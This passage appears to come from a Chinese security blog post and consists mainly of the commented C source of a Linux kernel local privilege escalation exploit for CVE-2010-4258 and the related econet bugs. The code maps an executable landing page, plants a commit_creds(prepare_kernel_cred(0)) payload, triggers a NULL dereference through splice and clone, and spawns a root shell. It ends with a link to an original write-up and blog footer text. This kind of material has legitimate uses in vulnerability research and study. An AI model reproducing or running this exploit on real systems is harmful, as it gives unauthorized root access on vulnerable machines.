_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

/*
 * Payload routine: calls prepare_kernel_cred(0) and hands the result to
 * commit_creds(), both through the file-level function pointers of the
 * same names. The parameters file and vma are not used. Always returns -1.
 */
static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

        commit_creds(prepare_kernel_cred(0));
        return -1;

}

/* Why do I do this?  Because on x86-64, the address of
 * commit_creds and prepare_kernel_cred are loaded relative
 * to rip, which means I can't just copy the above payload
 * into my landing area.
 *
 * The stub therefore loads the absolute address of getroot into
 * rax (x86-64) or eax (32-bit) and calls through that register. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
        asm("mov $getroot, %rax; call *%rax;");
#else
        asm("mov $getroot, %eax; call *%eax;");
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
 * via sock_no_sendpage, so it's under KERNEL_DS
 *
 * fildes: array of four descriptors; all of fildes[0..3] are used here.
 * Returns -1 when the SIOCSIFADDR ioctl fails; otherwise it ends in exit(0). */
int trigger(int * fildes)
{
        int ret;
        struct ifreq ifr;

        /* request structure naming the interface "eth0", all other fields zero */
        memset(&ifr, 0, sizeof(ifr));
        strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

        ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

        if(ret < 0) {
                printf("[*] Failed to set Econet address.\n");
                return -1;
        }

        /* move up to 128 bytes from fildes[3] to fildes[1], then from fildes[0] to fildes[2] */
        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

        /* Shouldn't get here... */
        exit(0);
}

/*
 * Entry point of the proof-of-concept listing. In order, it:
 *   1. creates a pipe, a PF_ECONET datagram socket and a read-only
 *      descriptor on /dev/zero (stored in fildes[0..3]);
 *   2. resolves four kernel symbols with get_kernel_sym();
 *   3. computes `target` and `landing`, maps two pages around `landing`
 *      and copies 1024 bytes starting at trampoline there;
 *   4. starts trigger() in a clone()d child, with `target` passed as the
 *      last clone() argument;
 *   5. after one second issues ioctl() on the socket and checks getuid().
 * Returns -1 on every reported failure; on success it replaces the
 * process image with /bin/sh via execl(). argc and argv are not used.
 */
int main(int argc, char * argv[])
{
        unsigned long econet_ops, econet_ioctl, target, landing;
        int fildes[4], pid;
        void * newstack, * payload;

        /* Create file descriptors now so there are two
           references to them after cloning...otherwise
           the child will never return because it
           deadlocks when trying to unlock various
           mutexes after OOPSing */
        pipe(fildes);
        fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
        fildes[3] = open("/dev/zero", O_RDONLY);

        /* report the first descriptor that is negative, together with errno */
        if(fildes[0] < 0) 
        {
                printf("[*] Failed to open fildes[0] = %d file descriptors. errno = %d\n", fildes[0], errno);
                return -1;
        }
        else if(fildes[1] < 0) 
        {
                printf("[*] Failed to open fildes[1] = %d file descriptors. errno = %d\n", fildes[1], errno);
                return -1;
        }
        else if(fildes[2] < 0) 
        {
                printf("[*] Failed to open file fildes[2] = %d descriptors. errno = %d\n", fildes[2], errno);
                return -1;
        }
        else if(fildes[3] < 0) 
        {
                printf("[*] Failed to open fildes[3] = %d file descriptors. errno = %d\n", fildes[3], errno);
                return -1;
        }

        /* Resolve addresses of relevant symbols */
        printf("[*] Resolving kernel addresses...\n");
        econet_ioctl = get_kernel_sym("econet_ioctl");
        econet_ops = get_kernel_sym("econet_ops");
        commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

        /* get_kernel_sym() returns 0 for a symbol it could not find */
        if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
                printf("[*] Failed to resolve kernel symbols.\n");
                return -1;
        }

        /* 64 KiB buffer; its upper end is passed to clone() as the child stack */
        if(!(newstack = malloc(65536))) {
                printf("[*] Failed to allocate memory.\n");
                return -1;
        }

        printf("[*] Calculating target...\n");
        /* OFFSET bytes below the address 10 pointer-sized slots into econet_ops */
        target = econet_ops + 10 * sizeof(void *) - OFFSET;

        /* Clear the higher bits */
        landing = econet_ioctl << SHIFT >> SHIFT;

        /* two pages, readable/writable/executable, fixed at the page containing landing */
        payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                       PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

        if ((long)payload == -1) {
                printf("[*] Failed to mmap() at target address.\n");
                return -1;
        }

        /* copy 1024 bytes starting at trampoline to the landing address */
        memcpy((void *)landing, &trampoline, 1024);

        /* child shares the address space (CLONE_VM), runs trigger(&fildes) on
           newstack, and has target registered via CLONE_CHILD_CLEARTID */
        clone((int (*)(void *))trigger,
              (void *)((unsigned long)newstack + 65536),
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
              &fildes, NULL, NULL, target);

        /* wait one second before going on */
        sleep(1);

        printf("[*] Triggering payload...\n");
        ioctl(fildes[2], 0, NULL);

        /* a non-zero uid means the credentials were not changed */
        if(getuid()) {
                printf("[*] Exploit failed to get root.\n");
                return -1;
        }

        printf("[*] Got root!\n");
        execl("/bin/sh", "/bin/sh", NULL);
}

Relevant Link:

https://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/

posted @ 2015-11-23 22:13 郑瀚阅读(1056) 评论(0) 编辑收藏举报

刷新页面返回顶部

Han Zheng, Thinker and Doer

Welcome to contact me. Wechat：LittleHann

karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

公告